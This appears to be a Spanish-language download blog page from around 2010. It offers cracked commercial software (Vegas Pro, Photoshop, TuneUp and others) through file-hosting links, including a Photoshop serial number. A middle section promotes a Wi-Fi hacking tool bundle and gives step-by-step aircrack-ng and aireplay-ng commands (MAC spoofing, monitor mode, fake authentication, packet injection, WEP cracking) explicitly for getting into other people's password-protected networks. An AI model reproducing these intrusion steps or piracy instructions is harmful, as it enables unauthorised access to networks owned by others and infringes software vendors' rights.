PROGRAMAS





Easy CD-DA Extractor 2010.1 [Portable]




Convierte entre formatos de audio, ripea y graba a CD


Pasa tus Compact Disc al PC con la ayuda de Easy CD-DA Extractor.

Este programa es uno de los más competos y profesionales para extraer el audio de un disco compacto y lo transformarlo en ficheros de sonido MP3 (u otros).

Easy CD-DA Extractor utiliza el compresor de sonido incluido en Windows para codificar los datos de audio, con lo que todos los codificadores disponibles en el sistema pueden ser usados por el programa.

Soporta el uso de unidades ATAPI, SCSI-2 y SCSI-3 CD/DVD. Soporta los modos ASPI y un modo especial NT-SCSI que te permite hacer extracción de audio digital profesional con un rendimiento mejorado.

Easy CD-DA Extractor tiene funciones como CDDB remoto o local, tags ID versión 3, lectura de la base de datos de Windows CDPLAYER.INI y de FreeCDDB y muchas otras opciones que te sorprenderán.

Easy CD-DA Extractor soporta los siguientes formatos:
MP1, MP2, MP3, Windows Media Audio 8, Windows Media Audio 9, Windows Media Audio 9.1, Ogg Vorbis, MP4, M4A, AAC, aacPlus v1, aacPlus v2, FLAC, Musepack, WavPack, WAV, AIFF, Monkey s Audio, Shorten, CUE y M3U

Cambios recientes en Easy CD-DA Extractor:
Actualizado códec MP3 LAME a 3.98.4
Añadido soporte ReplayGain para MP3
Corrección de un error en el conversor de audio

Para utilizar Easy CD-DA Extractor necesitas:
Sistema operativo: WinMe/2000/NT/XP/2003/Vista/7
Tamaño: 6 MB






Cartoon.Maker (Portable)






Crea divertidas caricaturas con cualquier fotografía que tengas, en cuestión de segundos, todo gracias a esta maravillosa aplicación.

Cartoon Maker es un excelente software que te permitirá utilizar cualquier imagen que poseas en tu ordenador y aplicarle diversos efectos para resaltar los rasgos más característico de la cara que estemos modificando.

También podrás utilizar la opción “sketch” que te permitirá pasar la imagen al formato de una historieta, resaltando las líneas, y dejando en blanco y negro todo, algo que queda realmente original y con lo que podrás sorprender a tus amigos y familiares.

La interfaz de Cartoon Maker es muy fácil de utilizar, y no tendrás ningún problema al momento de utilizarlo, sobre todo porque todas las opciones se encuentran a un clic de distancia.
Tamaño: 1 MB






Alcohol 120% es una utilidad capaz de grabar CD y DVD y que crea hasta 31 unidades virtuales. Estas unidades virtuales sirven para reproducir desde el disco duro como si tuvieses insertado el DVD o CD en cuestión.

Imagínate la utilidad de Alcohol 120%, sin ir más lejos, tendrás los CD o DVD que más uses "montados" en tu disco duro con lo que te ahorrarás buscarlos, ponerlos y quitarlos cada vez.

Alcohol 120% realiza copias de CD a CD, crea imágenes a disco duro, graba imágenes a CD/DVD, e incluye un buscador para localizar rápidamente las imágenes que se encuentren en tu PC.

Alcohol 120% soporta los siguientes formatos:
ISO, MDS, CCD, CUE, BWT, CDI, NRG, PDI
Tamaño: 9 MB






Unlocker 1.8.3






Seguro que más de una vez te ha ocurrido lo siguiente: intentas eliminar un fichero y recibes un mensaje de error diciendo que dicho archivo ya está en uso, o que no tienes permisos de acceso... En resumen: no puedes borrarlo.

Ahora cuentas con un aliado, se llama Unlocker y es un sencillo programa capaz de detectar qué aplicaciones y procesos tienen bloqueado tu archivo. Unlocker puede cerrar estos procesos, o desvincularlos de tu archivo, de modo que lo puedas borrar. No es infalible, pero sí de gran ayuda.

No tienes más que hacer clic derecho sobre el fichero en cuestión, elegir la opción “Unlocker” y liberar el fichero. ¡Listo!
Tamaño: 154 KB






Vegas Pro 8.0 (Full)






Vegas es un potente editor de vídeo orientado a profesionales o a usuarios que busquen resultados profesionales. Aúna una potente edición de audio y vídeo en una única y completa plataforma de creación.

En cuanto a la edición de vídeo, Vegas ofrece captura de dispositivos de alta calidad, más de 300 efectos y transiciones, soporte para edición y creación de subtítulos, codificación MPEG2 (para DVD), importa archivos SWF (animaciones Flash), y mucho más.

Su capacidad en cuanto a tratamiento de audio tampoco queda muy atrás, soportando un número ilimitado de pistas simultáneas, soporte para canales 5.1, más de 30 efectos personalizables y con la posibilidad de aumentar su capacidad y variedad gracias al soporte de plugins VST.

Un editor de vídeo muy completo y profesional.

• Cambios recientes en Sony Vegas:
• Edición multicámara
• Tituladora Sony ProType
• Soporte para Windows Vista
• Puede grabar discos Blu-ray
• Puede abrir archivos MJPEG y FLAC
• Mejoras en la exportación a la PSP

• Requisitos mínimos:
• Sistema operativo: WinXP/Vista
• Procesador: 1 GHz
• Memoria RAM: 1 GB
• Espacio libre en disco: 200 MB
• DirectX 9.0c
• .NET Framework 3.0
• Internet Explorer 5.1
• QuickTime 7.1.6 o superior
• Requisitos recomendados:
• Procesador: 2,8 GHz

Ahora tiene activas todas sus opciones, Efectos, Transionces, y MPG, ya se puede introducir archivos MPG a la linea de tiempo, y renderizar en MPG con el codec MainConcept.
Tamaño: 62 MB






Your Installer 2010 (Full)






Muchas veces te debe haber pasado que necesitabas probar un software y lo tuviste que instalar para saber que tal era.

El problema viene a la hora de desinstalar todas estas demos, versiones de prueba y demás, que de alguna u otra forma a veces dejan rastros en el PC: ficheros en ejecución que no pueden borrarse, carpetas vacías, accesos directos que ya no funcionan, entradas no válidas en el Registro de Windows, etc.

Your Uninstaller! es la mejor opción para realizar desinstalaciones totalmente limpias y olvidarse para siempre de estos indeseables rastros que pueden acabar afectando al rendimiento de tu PC.


También es capaz de editar y eliminar las opciones que aparecen en el menú contextual de Internet Explorer, limpiar el sistema de archivos temporales, o seleccionar los programas que quieres que se ejecuten al cargar tu sistema operativo y los que no. Casi nada!

Utiliza el sistema paso a paso de Your Uninstaller! cada vez que quieras desinstalar un programa, y olvídate de problemas.

Caracteristicas del programa:

- Remueve completamente cuaquier aplicación instalada.
- Profundo scaneo de registro y del disco entero por obsoletos archivos y entradas de registro.
- Remueve programas que no podrían ser removidos por Agregar o Quitar programas de Windows.
- Desinstala protectores de pantalla
- Remueve rastros de la navegación en Internet.
- Respalda y restaura registros.
- Administrador de gestión de claves.
- Integrado Limpiador de Disco que te ayudará a a encontrar y remover archivos innecesarios en tu disco para
salvar espacio y hacer tu PC mucho más rápida.
- Integrado Limpiador de Menú Contextual en IE, limpia el menu contextual de Internet Explorer.
- Integrado Administrador de Programas de Inicio, toma control total del inicio de windows.
- Corrige invalidos accesos directos del escritorio y accesos del menu inicio.
- Obten detalles de la aplicación incluso si esta escondida en directorios profundos, especialmente util para
encontrar aplicaciones Espias
- Respalda/ Restaura información de aplicaciones instaladas.
- Desinstala con sólo soltar el icono de un programa de tu escritorio en Uninstaller!
- Poderosa característica de busqueda te permite siempre econtrar el programa que deseas desinstalar.
- Detección de instalaciones invalidas que podrá remover con un click.
- Desinstala a la fuerza aquellos programas que Windows no puede (cuidado con su uso )
- Todo esto y mucho más con Your Uninstaller!.
Tamaño: 6 MB






Tune Up 2010 (Full)






El uso intensivo de Windows deteriora el rendimiento del equipo: irá más lento y con errores. Arreglar estos problemas a mano requiere demasiado tiempo. Por suerte, hay programas como TuneUp Utilities.

TuneUp Utilities es una impresionante suite de optimización del sistema. Tiene desfragmentador de disco duro, limpiador del Registro de Windows, eliminador de ficheros innecesarios, desinstalador de programas, editor del inicio de sistema, un panel para personalizar el aspecto de Windows... incluso hay un solucionador de problemas.

La ventana principal de TuneUp Utilities, clara e informativa, contiene todos los módulos del programa e indica si hay problemas que requieran tu intervención. En caso de duda, TuneUp Utilities te ayuda con recomendaciones para una optimización a medida.

Modo Turbo (novedad 2010)
¿Te gusta jugar y exprimir el máximo rendimiento de tu equipo? Activa el modo Turbo para que TuneUp Utilities desactive procesos en segundo plano y cambie el tema visual para que dispongas de todo el poder de tu máquina. Otro clic y TuneUp Utilities devolverá el sistema a su estado anterior. Puedes activarlo también desde el icono de la bandeja de sistema.

Optimización en tiempo real (novedad 2010)
La Optimización en tiempo real es otra característica impresionante de TuneUp Utilities. Se encarga de regular la prioridad de los procesos para que todos funcionen como la seda. Esto evita una infinidad de cuelgues molestos, ya que el procesador no estará sometido a sobrecargas de trabajo. Cuando esté en marcha, aparecerá un pequeño icono en la barra de tareas.

¿Quieres saber qué ha hecho TuneUp Utilities en los últimos días? El Informe de Optimización es otra de las novedades de la versión 2010. Separados en tres pestañas, hay resúmenes de todas las operaciones de mantenimiento efectuadas con éxito en los últimos siete y 30 días, así como desde la fecha de instalación.

Imprescindible para todo tipo de usuarios, TuneUp Utilities consigue que Windows sea un sistema operativo mejor.

Cambios recientes en TuneUp Utilities:
Nueva interfaz de usuario
Modo Turbo activable con un clic
Optimización en tiempo real
Desfragmentación más rápida
Compatible con Windows 7
Gadget de Escritorio para Vista y 7
Informe de optimización
Mantenimiento automático inteligente
Tamaño: 21 MB









Dani Martin "16 Añitos"






Artista o Grupo: Dani Martin
Título: 16 añitos
Formato: mp3
Bitrate: 128 kbps
Peso: 3,87MB
Enlace: http://www.megaupload.com/?d=7IT3KF3U


 


McDonalds el juego



 


Idioma: Español

Juego en el que llevas una tienda del McDonalds

Es en formato FLASH! Y al ser un juego sencillo...

Vicia que no veas, haber cuanto aguantais sin caer en la bancarrota!!

Espero que os guste, saludos y gracias!

Juego 100% en ESPAÑOL!



 

 


Songr, programa para bajar música gratis

¿Estás cansado de la granc antidad de virus y amenzas de seguridad que existen en los programas para descargar música como Ares o LimeWire? Entonces tal vez te convenga utilizar Songr, un programa para bajar música gratis que es altamente efectivo y muy simple de utilizar



 


Songr es una sencilla aplicación que nos permite descargar música gratis de Internet de una forma simple y bastante rápida, aunque -a diferencia de los programas P2P como el Ares o LimeWire- este se encarga de encontrar la música que estés buscando en servidores de Internet y no mediante los archivos que otros usuarios comparten; de esta manera se asegura que en realidad lo que estás bajando es música y no virus.

Otra gran característica de Songr a la hora de bajar música de Internet es que antes de comenzar con la descarga del archivo musical que hayamos seleccionado, permite escuchar la música antes de guardarla en el equipo para así asegurarnos que en realidad es la canción que nos interesa.

Otras características de Songr son:


•Realiza búsquedas en 10 servidores de música
•Permite bajar videos de youtube y extraer el audio del video.
•Permite escuchar la musica antes de descargarla, así la guardas en tu equipo y puedes editar mp3.
•Muestra losmejores resultados al principio, los que tienen más calidad primero.
•Convierte vinculos que apuntan a un sitio web directamente al archivo mp3 para descargar.
•No tiene publicidad
•Permite buscar canciones por medio de la letra de la cancion.
•Esun programa que podemos usar completamente gratis.

Descarga:




PDF Suite Professional 2010






PDF Suite te permite leer, crear, convertir, editar, revisar y proteger PDFs. Con la interfaz intuitiva de PDF Suite, empezarás a manejar documentos electrónicos en cuestión de minutos!

PDF Suite Professional 2010 es compatible con cualquier aplicación PDF y totalmente integrado con Microsoft Office. Puedes administrar cualquier documento creado con Adobe Acrobat Version 9 o superior. PDF Suite PRO te permite crear tus propios archivos PDF y protegerlos.

Características de PDF Suite Pro Edition 2010 :

* Ver, imprimir y buscar archivos PDF
* Crear documentos PDF desde cualquier aplicación capaz de imprimir
* Convertir Microsoft Word, Excel, PowerPoint, con sólo un botón
* Rotar, Alejar, Acercar, personalizar vista de documentos.
* Capturar páginas Web como archivos PDF dinámicos enriquecidos para revisiones y archivado.
* Guardar archivos PDF como documentos Microsoft Word, manteniendo la apariencia, las fuentes, el formato y las tablas, para facilitar el uso de los contenidos
* Ayuda a proteger los documentos PDF con clave de encriptación de 256-bits
* Niveles de Permiso: Aplicar restricciones de impresión, copia y modificación de documentos PDF
* Fusionar archivos de múltiples aplicaciones en un único documento PDF
* Administrar diferentes capas: trae contenido adelante/ o envialo atrás
* Insertar y editar hipervínculos (enlaces)
* Revisar documentos utilizando herramientas habituales como comentarios, texto destacado, líneas, formas y sellos
* Firma digitalmente documentos PDF
* Certificar documentos PDF utilizando identificaciones digitales
* Crear fácilmente formularios en PDF
* Distribuir formularios en PDF para recoger información y rastrear su Estado.
* Personalizar documentos PDF con plantillas personalizables
* Comparar y destacar las diferencias entre dos versiones de un documento PDF
* Adjuntar cualquier tipo de archivo a su documento PDF para apoyar su presentación.
* Adaptar y Optimizar el contenido de un documento PDF para su uso comercial, publicitario o en páginas Web.

Tamaño: 34 MB.
Incluye medicina





 


Adobe Photoshop CS5 Extended v12.0 Final Multilenguaje




Adobe Photoshop CS5 Extended v12.0 Final Multilenguaje
English, Spanish, Francés, Alemán, Portugués, Italiano, Otros | x86 & x64 | 1.0 GB | Medicina Incl. |
cripción El software de Adobe® Photoshop® CS5 Extended le ayuda a crear las imágenes más innovadoras para impresión, la Web y vídeo. Consiga todas las capacidades de edición, composición y pintura de última generación del estándar del sector Photoshop CS5 además de herramientas que le permitirán crear y editar imágenes 3D y contenido animado.
Requisitos:

Procesador Intel® Pentium® 4 o AMD Athlon® de 64 bits
Microsoft® Windows® XP con Service Pack 3; Windows Vista® Home Premium, Business, Ultimate o Enterprise con Service Pack 1 (se recomienda Service Pack 2); o Windows 7
1 GB de RAM
1 GB de espacio disponible en el disco duro para la instalación; se necesita espacio libre adicional durante la instalación (no se puede instalar en dispositivos de almacenamiento extraíbles basados en flash)
Resolución de 1.024 x 768 (se recomienda de 1.280 x 800) con tarjeta gráfica OpenGL cualificada y acelerada de hardware, color de 16 bits y 256 MB de VRAM
Algunas funciones de aceleración de la GPU requieren que los gráficos sean compatibles con Shader Model 3.0 y OpenGL 2.0
Unidad de DVD-ROM
Software QuickTime 7.6.2 necesario para funciones multimedia
Conexión a Internet de banda ancha necesaria para los servicios en línea**






 


Media Monkey Gold v3.2.1.1297 Portable




Idioma: Español

MediaMonkey es capaz de realizar todo lo que puedas imaginar con tu musica digital. Desde corregir las etiquetas informativas de los archivos y renombrar el fichero, pasando por analizar el volumen, convertir tus CD, o hasta grabar tu musica a Audio CD.

En principio se trata de un reproductor y catalogador, pero rapidamente te daras cuenta de la enorme cantidad de cosas que puedes llegar a hacer con MediaMonkey.

El programa analiza tus canciones (las de los directorios que le indiques) y te los muestra perfectamente catalogados, por titulo, interprete, album, canciones a editar y por valoracion (con estrellas), son algunas de las formas de clasificacion posibles.
MediaMonkey soporta los siguientes formatos: MP3, Ogg, WAV, WMA, VQF, Audio CD y mas






Nero Multimedia Suite 10






Nero Multimedia Suite 10


Tres productos, una solución

Nero Vision Xtra™
* Reproduzca, busque de forma rápida y organice fácilmente todas sus fotos, vídeos y música con el organizador multimedia todo en uno
* Agregue unos toques personales avanzados a sus presentaciones de diapositivas de fotos y efectos especiales a las películas para crear producciones de discos Blu-ray y DVD de alta definición al estilo del cine como un profesional
* Grabe fotos, vídeos y música en CD, DVD y discos Blu-ray o comparta el contenido multimedia con las redes sociales de Internet

Nero Burning ROM
* Asegure la legibilidad de sus discos a pesar de los arañazos, el paso del tiempo o el deterioro con la tecnología de protección SecurDisc
* Arrastre y coloque archivos para grabarlos y copiarlos en CD, DVD y discos Blu-ray o guarde imágenes de disco
* Divida archivos con un tamaño excesivo en varios discos
* Utilice cifrado y contraseñas personales para lograr una protección extra de sus datos

Nero BackItUp & Burn
* Cree una copia de seguridad automática con sólo un clic y sin necesidad de redefinir la configuración de su equipo
* Restaure los datos personales después de un fallo del ordenador o un accidente
* Recupere los archivos dañados o eliminados de CD, DVD, unidades de disco duro, almacenamiento flash y disquetes

Más...
Nero StartSmart: Centro de comandos orientado a tareas para la grabación, edición de vídeo o creación de copias de seguridad
Nero DiscCopy Gadget: Copia de discos desde el Escritorio de Windows®
Nero CoverDesigner: Creación de etiquetas y carátulas personalizadas
SoundTrax: Digitalización de joyas sonoras almacenadas en vinilos y cintas
Nero WaveEditor: Edición de archivos de música
Nero Recode: Conversión y compresión de archivos de vídeo o de DVD de vídeo
Nero Toolkit: Mejora del rendimiento del PC





Daemon Tools



EMULADOR DE ARCHIVOS .iso DAEMON TOOLS PARA WINDOWS XP Y PARA WINDOWS VISTA
http://www.megaupload.com/?d=FL3DBCS1





Puede convertir los archivos de videos flv que se bajan de youtube o de paginas parecidas 

http://www.megaupload.com/?d=A6FD5ZRS



Vegas Pro 8.0 
Vegas es un potente editor de vídeo orientado a profesionales o a usuarios que busquen resultados profesionales. Aúna una potente edición de audio y vídeo en una única y completa plataforma de creación.

En cuanto a la edición de vídeo, Vegas ofrece captura de dispositivos de alta calidad, más de 300 efectos y transiciones, soporte para edición y creación de subtítulos, codificación MPEG2 (para DVD), importa archivos SWF (animaciones Flash), y mucho más.

Su capacidad en cuanto a tratamiento de audio tampoco queda muy atrás, soportando un número ilimitado de pistas simultáneas, soporte para canales 5.1, más de 30 efectos personalizables y con la posibilidad de aumentar su capacidad y variedad gracias al soporte de plugins VST.

Un editor de vídeo muy completo y profesional. 


http://www.megaupload.com/?d=XF9R4N2L


Transformar FLV a AVI



Buenos amigos esta vez les doy a conocer algunos  para facilitarnos el acceso a internet por medio de nuestro Wifi los cuales  siempre estan protegidos con contraseñas, estos les atudaran a entrar y descubrir la contraseña de acceso.

Wifi Hack Aio 2010


















El  incluye potentes softwares en deteccón y cifrado de redes ideal para Hackear Redes Wi-Fi. Incluye una recopilación de Programas de cifrado de gran alcance en la detección de red y es ideal para cortar las redes WiFi.

Este AiO contiene:

Windows Tools
• WiresHark
• AirSnare
• WirelessKeyView
• Wifi Monster
• NetStumbler
• Easy Wifi Radar
• SmartSniff
• Ettercap
• WinPcap
• CommView

Windows Tools 2
• Nmap
• Wirelessmon
• PocketWarrior
• Inssider
• RemoteAnyWhere
• PmoniPacketMon
• ApTools
• WiFiFoFum
• Advanced Port Scanner
• NetSurveyor

Backtrack
• Enlace de descarga para BackTrack 4 Pre Release
• Enlace de descarga para BackTrack 4 Beta Release
• Enlace de descarga para BackTrack 3 VmWare Image
• Enlace de descarga para BackTrack 3
• Enlace de descarga para BackTrack 3 USB Version

PDF’s & Tutorials
• Hacking Wireless Networks
• Cracking WEP and WPA WiFi
• Wifi Hacking
• Hacking Asus WL520gU
• BackTrack PDFs
• WiFi Advanced Fuzzing
• Wifi Security
• Wireless Sniffing WiresHark
• Wireless Hacking Tools

Bonus Software
• Net Tools
• WepGen
• Cantennator
• Anchorfree
• Cain and Abel
• Wifi Drivers
• Brutus
• VmWare Keygen
• LanHelper

• Nombre completo de la aplicación: AIO Wifi Hack 2010
• Versión: 2010
• Idioma: Ingles
• Tamaño: 163.11 MB
• Formato: WinRaR
• Medicina: Full
• Sistema Operativo: Windows XP, Win 7 y Vista
• Servidores de descarga: Megaupload y FreakShare

FreakShare:
http://freakshare.net/files/4mt53feb/AIO.Prog.Para.Hac.WiFi.2010.part1.rar.html
http://freakshare.net/files/6dm3mmyn/AIO.Prog.Para.Hac.WiFi.2010.part2.rar.html

Megaupload:
http://www.megaupload.com/?d=AOQM4ZZI
http://www.megaupload.com/?d=MREDZP4U


Listo por otro lado les dejo el manual o tutorial para que puedan utilizar este otro programa que es exelente.

Backtrack 4 BackTrack, es una herramienta pensada y diseñada para (desencriptar contraseñas wifi).

Aqui les dejo entonces el tutoríal para el  de backtrack 4 y tambien un vídeo mírenlo, abajo de el pondré los links para descargar backtrack y los comandos a utilizar.
De aqui pueden descargarlo en formato iso.

http://www.megaupload.com/?d=Z3IM9KWT


Comandos utilizados:

1-.- iwconfig
2.- airmon-ng  (nombre de interfaz)
3.- airodump-ng (nombre de inferfaz)
4.- airodump-ng -c (canal del modem) -w (nombre de  para la captura) - - bssid ( BSSID del modem) (nombre de la interfaz)
5.- aireplay-ng -1 0 -a (BSSID) (nombre de interfaz)
6.- aireplay-ng -3 -b (BSSID) (nombre de interfaz)
7.- aircrack-ng (nombre de archivo de captura) -01.cap (nombre de interfaz)

Aqui viene el tercer programa tambien muy bueno

Aircrack-ng [M4-GUI-Versión] Linux 0.7.0 Final

Bajar programa desde :
http://aircrackgui-m4.googlecode.com/files/aircrack-GUI-M4%200.7.0%20Final%20x86.rar
para 32 bits
http://aircrackgui-m4.googlecode.com/files/aircrack-GUI-M4%200.7.0%20Final%20x86_64.rar
para 64 bits

Como Funciona El Programa

1.- Clic en opción 'Airodump' y luego clic 'Start' y esperar que aparezcan las conexiones Wifi existentes en la zona.
2.- Clic en la Wifi deseada (la que tenga mayor 'POWER') y queda marcada.
3.- Clic 'Capture' (en sección Main Options) y el programa busca clave de la Wifi.
Toma tiempo...!!!

Notas :
a) si en opción 'deauthenthication' y/o 'Authentication' nos sale, en letras rojas, algo parecido : mon0 is on channel -1, but the AP uses channel 3
es que el programa no funciona. Buscar solución en Forums.
b) si en algunas de las opciones nos piden abrir archivo '.cap' se le encuentra en la carpeta 'capture'.

En ésta imagen vista opción 'Airdump'



Opción 'Fake Deauth'



Otro metodo por medio de comandos que deberán ejecutarse:

Abrir el terminal...

Instalar el programa

sudo apt-get install aircrack
sudo ifconfig wlan0 down
sudo ifconfig wlan0 hw ether 00:11:22:33:44:55
sudo ifconfig wlan0 up

Poner tu tarjeta en modo monitor.

sudo airmon-ng start wlan0
sudo airodump-ng -w wifi wlan0

ahora ponemos el canal

sudo iwconfig wlan0 mode Monitor channel #
# = canal de la wifi

Establecemos la comunicación:

sudo aireplay-ng -1 0 -e “nombre de la red” -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 wlan0

********************************************************************************
Nota : nombre de la red WLAN_28
xx:xx: etc sale de WLAN_20 = ver lo que sigue (BSSID)
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1A:2B:13:06:26 -33 402 4 0 3 54 WEP WEP WLAN_28
*********************************************************************************

Esperamos a tener 150.000 ivs según para que tipo de clave se necesita.

Esperar y Listo !!!


_____________________________________________________________

Hoy les traigo este programa

Adobe Reader X es el lector oficial de archivos PDF. Se integra con la mayoría de navegadores web y permite imprimir, comentar y compartir documentos fácilmente.
La versión X de Adobe Reader es la más segura hasta la fecha, gracias al nuevo Modo Protegido, que carga , código, fuentes y objetos  en un espacio de memoria aislado. La interfaz también ha cambiado: es más ligera y clara que en versiones anteriores.
Por supuesto, las herramientas clásicas de Adobe Reader siguen en su sitio. A la lupa, el selector de texto e , la instantánea o el lector en voz alta se añaden funciones renovadas de comentario, que simplifican mucho resaltar texto y añadir notas.
La opción Compartir es una novedad de Adobe Reader X. Con ella es posible enviar el documento por correo electrónico a través del servicio Adobe SendNow. La integración de Adobe Reader con los servicios en línea, Acrobat.com, también está presente.
Más , fiable y sencillo, Adobe Reader X es una utilidad imprescindible si necesitas abrir e imprimir documentos PDF a menudo. Y con el modo de lectura a pantalla completa, incluso en las pantallas más pequeñas es posible disfrutar de la calidad de los PDF.

Tamaño de fichero: 34.36MB
Requisitos: Windows 2000 / XP / 2003 / Vista / Windows7 / XP64 / Vista64 / Windows7 64
Idiomas: ES
Licencia: Freeware

DESCARGAR AQUI
______________________________________________________________







7.85 MB | Win2000/XP/Vista


Tanto si tienes una cámara web real como si no, con WebcamMax podrás añadir todo tipo de efectos a laimagen de vídeo que estés retransmitiendo.

Tienes un amplio abanico para elegir, clasificados en diversas categorías: colores, animalespelículas, famosos, videojuegos, amor... Cada uno de ellos sobreimpresionará un texto, un logo, un marco, una imagen, etc. o aplicará un efecto sobre el vídeo, cuyo resultado además puedes comprobar en tiempo real.

WebcamMax funciona con un gran número de aplicaciones de videoconferencia. como MSN Messenger, ICQ, AIM, Skype, Yahoo! Messenger o Camfrog. También tiene soporte para cámaras web virtuales generadas por otra aplicación y puede grabar vídeo y realizar capturas de pantalla.

link de descargas

http://www.easy-share.com/1903971863/WebcamMax.v5.1.0.8.x86.sfrd.rar 

http://www.megaupload.com/?d=2QRP5Q39 


http://depositfiles.com/files/5rogj76sp 




Video Acelerador para Youtube




De los creadores de DAP (Download Accelerator Plus) sale un nuevo software que promete acelerar la visualización de videos de YouTube, Video Accelerator for YouTube (800KB). En teoría hace esto:

* Soluciona los problemas de “congelamiento” y “buffering” de la reproducción.
* Acelera el streamign de video de YouTube.
* También funciona en videos YouTube incrustados en otras páginas. 


clik aqui para descargar





Caricature Studio 3.0










Con Caricature Studio podremos transformar cualquier foto en una caricatura; nos permite añadir texto, cuadros de dialogo, modificar la imagen, etc.

Uno de los puntos fuertes del programa es que es fácil de utilizar y puedes personalizar a tal extremo una foto que el trabajo parece ser profesional, quien sabe tal vez te ayude en tu trabajo si te dedicas a este tipo de arte.


Peso: 5Mb

Descarga:
http://rapidshare.com/files/117636086/Caricature_Studio3.0__CARICATURA__marvinpugh.rar 


______________________________________________________________________________


qui les dejo este post tangueros, contiene el link para descargar photoshop 7.0, este programa es util para realizar diseños para una web o hacer montajes, retoques fotograficos y todo lo relacionado a el diseño grafico (flyers, tarjetas de presentacion, tarjetas de invitacion, pancartas, carteles, etc). Espero que lo disfruten!
142fc496eac1104b24ae30fdcb1cffa1




contraseña: denlasgracias

http://www.megaupload.com/?d=FT80T48T

el serial esta en el .rar, bueno les pongo el serial de todos modos:
1045-1209-6738-4668-7696-2783

Y sobre el idioma en algunas pc sale en español, pero por si las dudas aqui esta la traduccion al español.

http://www.megaupload.com/?d=W83WYJ38

Y las instrucciones para traducirlo:

La traducción al español parece ser para el photoshop CS3. Mira lo que pone las instrucciones que adjuntas con la traducción:
-------------------------------------------------------------------
1º. Copiamos todos los archivos de la carpeta "Required".
2º. Abrimos la carpeta madre del PhotoShop CS3 "C:Archivos de programaAdobeAdobe Photoshop CS3"
3º. Abrimos la carpeta Required y Pegamos lo que anteriormente hemos copiado de la otra carpeta.
Y a todo lo que pida reemplazer le decimo que NO!

En caso que te marque algun error, cerra y velvé abrirlo por única vez.
-------------------------------------------------------------------


El programa es completo osea full!!!

Numero de descargas:



Numero de descargas 15 de septiembre




He aqui una de las cosas mas sencillas que se hacen en photoshop:

Ejemplo 1:

Imagen original



Imagen retocada



Imagen de la capa que transforma a la imagen a color



Esto es para que se motiven a descargar y aprender de este maravilloso y sencillo software.


Para conseguir tutoriales y materiales de photoshop entra a:

http://www.todo-photoshop.com/

Y si tienes dudas y requieres ayuda de expertos entra a su foro:

http://www.todo-photoshop.com/foros/index.php

No hay comentarios: